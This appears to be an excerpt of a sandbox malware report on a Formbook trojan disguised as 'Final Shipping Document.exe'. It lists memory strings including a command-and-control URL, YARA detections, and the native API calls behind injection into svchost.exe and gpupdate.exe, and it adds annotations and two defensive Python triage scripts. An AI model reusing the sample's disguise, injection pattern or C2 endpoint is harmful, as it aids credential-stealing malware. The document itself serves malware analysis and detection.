            Source: gpupdate.exe, 00000005.00000002.3888691030.0000000003187000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: gpupdate.exe, 00000005.00000002.3888691030.0000000003187000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: gpupdate.exe, 00000005.00000002.3888691030.0000000003187000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: gpupdate.exe, 00000005.00000002.3888691030.0000000003164000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: gpupdate.exe, 00000005.00000002.3888691030.0000000003187000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: gpupdate.exe, 00000005.00000002.3888691030.0000000003187000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: gpupdate.exe, 00000005.00000003.2642977776.0000000008194000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: gpupdate.exe, 00000005.00000002.3891568008.0000000006210000.00000004.10000000.00040000.00000000.sdmp, QnAcfZuONg.exe, 00000007.00000002.3890876072.0000000003E70000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.9muyiutyt.online/39t8/?ejlto=QtkhctgpxJahPP0&1Hg=89XVD
            Source: gpupdate.exe, 00000005.00000003.2665197301.00000000081BD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
            Source: gpupdate.exe, 00000005.00000003.2665197301.00000000081BD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: C:\Users\user\Desktop\Final Shipping Document.exe | Code function: 0_2_00C1EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00C1EAFF
            Source: C:\Users\user\Desktop\Final Shipping Document.exe | Code function: 0_2_00C1ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00C1ED6A
            Source: C:\Users\user\Desktop\Final Shipping Document.exe | Code function: 0_2_00C1EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00C1EAFF
            Source: C:\Users\user\Desktop\Final Shipping Document.exe | Code function: 0_2_00C0AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_00C0AA57
            Source: C:\Users\user\Desktop\Final Shipping Document.exe | Code function: 0_2_00C39576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00C39576

            E-Banking Fraud

            Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000004.00000002.3890307016.0000000003470000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.3890277964.0000000004C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.3890392415.0000000004C70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2370426785.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.3892567751.0000000005550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2370049764.0000000003220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.3888449538.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2369314894.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3890307016.0000000003470000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3890277964.0000000004C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3890392415.0000000004C70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2370426785.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3892567751.0000000005550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2370049764.0000000003220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3888449538.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2369314894.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: Final Shipping Document.exeString found in binary or memory: This is a third-party compiled AutoIt script.
Source: Final Shipping Document.exe, 00000000.00000000.2024915795.0000000000C62000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_f5b702e8-6
Source: Final Shipping Document.exe, 00000000.00000000.2024915795.0000000000C62000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer | memstr_8442c1ab-5
Source: Final Shipping Document.exe | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_fdb0c75a-9
Source: Final Shipping Document.exe | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer | memstr_0451d695-3
Note: the long string block is the Unicode script and category name table of the PCRE engine that AutoIt3 bundles for StringRegExp, followed by AutoIt3 runtime strings (the RunAs privilege and window-station names, the ControlListView view names and the [LAST]/[ACTIVE]/[HANDLE:]/[REGEXPTITLE:]/[CLASS:] window-title keywords). It belongs to the interpreter, not to the embedded script, so it identifies the packaging rather than the payload.
Source: initial sample | Static PE information: Filename: Final Shipping Document.exe
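A triage check for the evidence in the rows above, added here as an example; it is not part of the report and not Joe Sandbox's own logic. It scans a buffer (file bytes or a memory dump) for the AutoIt runtime strings the rows quote, searching each as ANSI and as UTF-16LE, and renders hits in the same row shape. The AU3!EA06 resource magic is an assumption taken from the AutoIt file format, not a string the report cites, and both sample buffers are constructed.

```python
import re

# The exact runtime string the report lists as evidence, plus strings from
# the same AutoIt3 runtime blob the report quotes.
AUTOIT_CORE = b"This is a third-party compiled AutoIt script."
AUTOIT_SECONDARY = (
    b"AutoIt3GUI",
    b"SeAssignPrimaryTokenPrivilege",
    b"SeIncreaseQuotaPrivilege",
)
# Assumption: resource magic of a compiled AutoIt v3 script payload. Known
# from the file format, not cited anywhere in the sandbox report.
AU3_MAGIC = b"AU3!EA06"


def _offsets(data: bytes, needle: bytes) -> list:
    """Offsets of `needle` in `data`, searched both as ANSI and as UTF-16LE."""
    wide = needle.decode("ascii").encode("utf-16-le")
    hits = [m.start() for m in re.finditer(re.escape(needle), data)]
    hits += [m.start() for m in re.finditer(re.escape(wide), data)]
    return sorted(hits)


def scan_autoit(data: bytes) -> dict:
    """Classify a buffer by the AutoIt runtime strings it contains."""
    found = {}
    for needle in (AUTOIT_CORE, AU3_MAGIC) + AUTOIT_SECONDARY:
        offs = _offsets(data, needle)
        if offs:
            found[needle.decode("ascii")] = offs
    core = AUTOIT_CORE.decode() in found or AU3_MAGIC.decode() in found
    secondary = sum(s.decode() in found for s in AUTOIT_SECONDARY)
    if core:
        verdict = "compiled AutoIt script"
    elif secondary >= 2:
        verdict = "probable AutoIt runtime, core marker missing (check for string obfuscation)"
    else:
        verdict = "no AutoIt indicators"
    return {"verdict": verdict, "evidence": found}


def evidence_lines(source: str, result: dict) -> list:
    """Render hits in the same row shape the report uses."""
    return [
        f"Source: {source} | String found in binary or memory: {s} "
        f"(at {', '.join(hex(o) for o in offs)})"
        for s, offs in result["evidence"].items()
    ]


# Constructed sample buffers (not the real binary): a fake PE-like blob that
# stores the marker as UTF-16LE, the way AutoIt keeps most of its strings,
# and a clean blob with no indicators.
SAMPLE_AUTOIT = (
    b"MZ" + b"\x00" * 62
    + AUTOIT_CORE.decode("ascii").encode("utf-16-le")
    + b"\x00" * 16
    + b"AutoIt3GUI\x00SeIncreaseQuotaPrivilege\x00"
)
SAMPLE_CLEAN = b"MZ" + b"\x00" * 62 + b"Hello, world\x00"

if __name__ == "__main__":
    for name, buf in (("constructed_autoit.bin", SAMPLE_AUTOIT),
                      ("constructed_clean.bin", SAMPLE_CLEAN)):
        result = scan_autoit(buf)
        print(f"{name}: {result['verdict']}")
        for line in evidence_lines(name, result):
            print("  " + line)
```

The ANSI plus UTF-16LE search matters because the report found the marker both in the file and in a memory dump; a scanner that only looks for the narrow string misses the wide copy, and one that only looks at the file misses an unpacked payload.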
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042C043 NtClose
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03372B60 NtClose, LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03372DF0 NtQuerySystemInformation, LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03372C70 NtFreeVirtualMemory, LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_033735C0 NtCreateMutant, LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03374340 NtSetContextThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03374650 NtSuspendThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03372BA0 NtEnumerateValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03372B80 NtQueryInformationFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03372BF0 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03372BE0 NtQueryValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03372AB0 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03372AF0 NtWriteFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03372AD0 NtReadFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03372F30 NtCreateSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03372F60 NtCreateProcessEx
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03372FB0 NtResumeThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03372FA0 NtQuerySection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03372F90 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03372FE0 NtCreateFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03372E30 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03372EA0 NtAdjustPrivilegesToken
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03372E80 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03372EE0 NtQueueApcThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03372D30 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03372D10 NtMapViewOfSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03372D00 NtSetInformationFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03372DB0 NtEnumerateKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03372DD0 NtDelayExecution
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03372C00 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03372C60 NtCreateKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03372CA0 NtQueryInformationToken
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03372CF0 NtOpenProcess
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03372CC0 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03373010 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03373090 NtSetValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_033739B0 NtGetContextThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03373D10 NtOpenProcessToken
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03373D70 NtOpenThread
Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: 5_2_04F04650 NtSuspendThread, LdrInitializeThunk
Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: 5_2_04F04340 NtSetContextThread, LdrInitializeThunk
Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: 5_2_04F02CA0 NtQueryInformationToken, LdrInitializeThunk
Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: 5_2_04F02C70 NtFreeVirtualMemory, LdrInitializeThunk
Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: 5_2_04F02C60 NtCreateKey, LdrInitializeThunk
Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: 5_2_04F02DF0 NtQuerySystemInformation, LdrInitializeThunk
Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: 5_2_04F02DD0 NtDelayExecution, LdrInitializeThunk
Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: 5_2_04F02D30 NtUnmapViewOfSection, LdrInitializeThunk
Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: 5_2_04F02D10 NtMapViewOfSection, LdrInitializeThunk
Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: 5_2_04F02EE0 NtQueueApcThread, LdrInitializeThunk
Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: 5_2_04F02E80 NtReadVirtualMemory, LdrInitializeThunk
Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: 5_2_04F02FE0 NtCreateFile, LdrInitializeThunk
Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: 5_2_04F02FB0 NtResumeThread, LdrInitializeThunk
Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: 5_2_04F02F30 NtCreateSection, LdrInitializeThunk
Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: 5_2_04F02AF0 NtWriteFile, LdrInitializeThunk
Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: 5_2_04F02AD0 NtReadFile, LdrInitializeThunk
Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: 5_2_04F02BF0 NtAllocateVirtualMemory, LdrInitializeThunk
Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: 5_2_04F02BE0 NtQueryValueKey, LdrInitializeThunk
Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: 5_2_04F02BA0 NtEnumerateValueKey, LdrInitializeThunk
Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: 5_2_04F02B60 NtClose, LdrInitializeThunk
Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: 5_2_04F035C0 NtCreateMutant, LdrInitializeThunk
Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: 5_2_04F039B0 NtGetContextThread, LdrInitializeThunk
Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: 5_2_04F02CF0 NtOpenProcess
Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: 5_2_04F02CC0 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: 5_2_04F02C00 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: 5_2_04F02DB0 NtEnumerateKey
Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: 5_2_04F02D00 NtSetInformationFile
Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: 5_2_04F02EA0 NtAdjustPrivilegesToken
Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: 5_2_04F02E30 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: 5_2_04F02FA0 NtQuerySection
Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: 5_2_04F02F90 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: 5_2_04F02F60 NtCreateProcessEx
Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: 5_2_04F02AB0 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: 5_2_04F02B80 NtQueryInformationFile
Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: 5_2_04F03090 NtSetValueKey
Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: 5_2_04F03010 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: 5_2_04F03D70 NtOpenThread
Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: 5_2_04F03D10 NtOpenProcessToken
Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: 5_2_02DA8A60 NtReadFile
Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: 5_2_02DA8BF0 NtClose
Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: 5_2_02DA8B50 NtDeleteFile
Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: 5_2_02DA88F0 NtCreateFile
Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: 5_2_02DA8D60 NtAllocateVirtualMemory
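The two Nt* stub tables above are one piece of code mapped at two bases: svchost.exe's NtClose at 0x03372B60 and gpupdate.exe's at 0x04F02B60 are 0x01B90000 apart, and the same delta separates every other stub pair (NtQuerySystemInformation 0x03372DF0/0x04F02DF0, NtQueueApcThread 0x03372EE0/0x04F02EE0, and so on). The following added example, mine rather than the report's, parses rows in this shape, pairs each process's Nt* stubs by API name, and finds the dominant address delta between two processes; one dominant delta with near-total agreement means the same injected module at a different base, not two independently written stub tables. The sample rows are a subset of the report's own, with two rows left in the raw fused form the extraction produced, to show the parser copes with both.

```python
import re
from collections import Counter, defaultdict

# One report row, tolerant of both the rendered form
# ("... | Code function: 2_2_03372B60 NtClose, LdrInitializeThunk") and the raw
# extraction with the id cell fused onto the end
# ("...exeCode function: 2_2_03372B60 NtClose,LdrInitializeThunk,2_2_03372B60").
ROW = re.compile(
    r"Code function:\s*(?P<pid>\d+)_(?P<run>\d+)_(?P<addr>[0-9A-Fa-f]{8})\s*(?P<apis>.*)$"
)
FUNC_ID = re.compile(r"^\d+_\d+_[0-9A-Fa-f]{8}$")


def parse_rows(lines):
    """Yield (pid, address, [api names]) for every 'Code function' row."""
    for line in lines:
        m = ROW.search(line)
        if not m:
            continue
        apis = [a.strip() for a in m["apis"].split(",")]
        apis = [a for a in apis if a and not FUNC_ID.match(a)]  # drop the duplicated id cell
        yield int(m["pid"]), int(m["addr"], 16), apis


def native_calls(lines):
    """{pid: {api: {addresses}}}, keyed on the first API of each row.

    The first name is the Nt* function the stub wraps; the trailing
    LdrInitializeThunk is not reported for both processes on every row and
    would otherwise spoil the pairing.
    """
    calls = defaultdict(lambda: defaultdict(set))
    for pid, addr, apis in parse_rows(lines):
        if apis:  # bare rows with no API name carry nothing to pair
            calls[pid][apis[0]].add(addr)
    return calls


def relocation_delta(calls, pid_a, pid_b):
    """(delta, votes, shared): the most common addr_b - addr_a over APIs seen
    in both processes, how many stub pairings agree on it, and how many APIs
    the two processes share."""
    shared = calls[pid_a].keys() & calls[pid_b].keys()
    deltas = Counter()
    for api in shared:
        for a in calls[pid_a][api]:
            for b in calls[pid_b][api]:
                deltas[b - a] += 1
    if not deltas:
        return None, 0, 0
    delta, votes = deltas.most_common(1)[0]
    return delta, votes, len(shared)


def shared_stub_table(calls, pid_a, pid_b, delta):
    """Sorted [(addr_in_a, api)] for stubs that sit exactly `delta` apart."""
    table = []
    for api, addrs in calls[pid_a].items():
        for a in sorted(addrs):
            if a + delta in calls[pid_b].get(api, ()):
                table.append((a, api))
    return sorted(table)


# Constructed input: a subset of the report's rows, two of them in the raw
# fused form. Not a complete copy of the report.
SAMPLE_ROWS = r"""
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042C043 NtClose
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03372B60 NtClose, LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03372DF0 NtQuerySystemInformation, LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03372E30 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03372EE0 NtQueueApcThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03374340 NtSetContextThread
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03372C70
Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: 5_2_04F02B60 NtClose, LdrInitializeThunk
Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: 5_2_04F02DF0 NtQuerySystemInformation, LdrInitializeThunk
Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: 5_2_04F02E30 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: 5_2_04F02EE0 NtQueueApcThread
Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: 5_2_04F04340 NtSetContextThread, LdrInitializeThunk
Source: C:\Windows\SysWOW64\gpupdate.exeCode function: 5_2_04F02C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_04F02C70
Source: C:\Windows\SysWOW64\gpupdate.exe | Code function: 5_2_02DA8BF0 NtClose
""".strip().splitlines()

if __name__ == "__main__":
    calls = native_calls(SAMPLE_ROWS)
    delta, votes, shared = relocation_delta(calls, 2, 5)
    print(f"pid 5 = pid 2 + {delta:#x} for {votes} of {shared} shared Nt* stubs")
    for addr, api in shared_stub_table(calls, 2, 5, delta):
        print(f"  {addr:#010x} -> {addr + delta:#010x}  {api}")
```

The NtClose rows at 0x0042C043 (svchost.exe) and 0x02DA8BF0 (gpupdate.exe) do not fit the delta and are correctly left out of the shared table: they belong to other code in each process, which is why the function votes per API pairing instead of assuming every stub relocates together.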
Source: C:\Users\user\Desktop\Final Shipping Document.exe | Code function: 0_2_00C0D5EB CreateFileW, DeviceIoControl, CloseHandle
Source: C:\Users\user\Desktop\Final Shipping Document.exe | Code function: 0_2_00C01201 LogonUserW, DuplicateTokenEx, CloseHandle, OpenWindowStationW, GetProcessWindowStation, SetProcessWindowStation, OpenDesktopW, _wcslen, LoadUserProfileW, CreateEnvironmentBlock, CreateProcessAsUserW, UnloadUserProfile, GetProcessHeap, HeapFree, CloseWindowStation, CloseDesktop, SetProcessWindowStation, CloseHandle, DestroyEnvironmentBlock
Source: C:\Users\user\Desktop\Final Shipping Document.exe | Code function: 0_2_00C0E8F6 ExitWindowsEx, InitiateSystemShutdownExW, SetSystemPowerState
Note: these three chains are in the sample's own code (process 0, the initial AutoIt-compiled executable) and match the AutoIt3 interpreter's built-in RunAs() (LogonUserW through CreateProcessAsUserW, with the winsta0\default window-station strings quoted above) and Shutdown() (ExitWindowsEx, InitiateSystemShutdownExW, SetSystemPowerState) implementations. Every compiled AutoIt binary carries them, so on their own they say nothing about what the embedded script does.
Source: C:\Users\user\Desktop\Final Shipping Document.exe | Code functions:
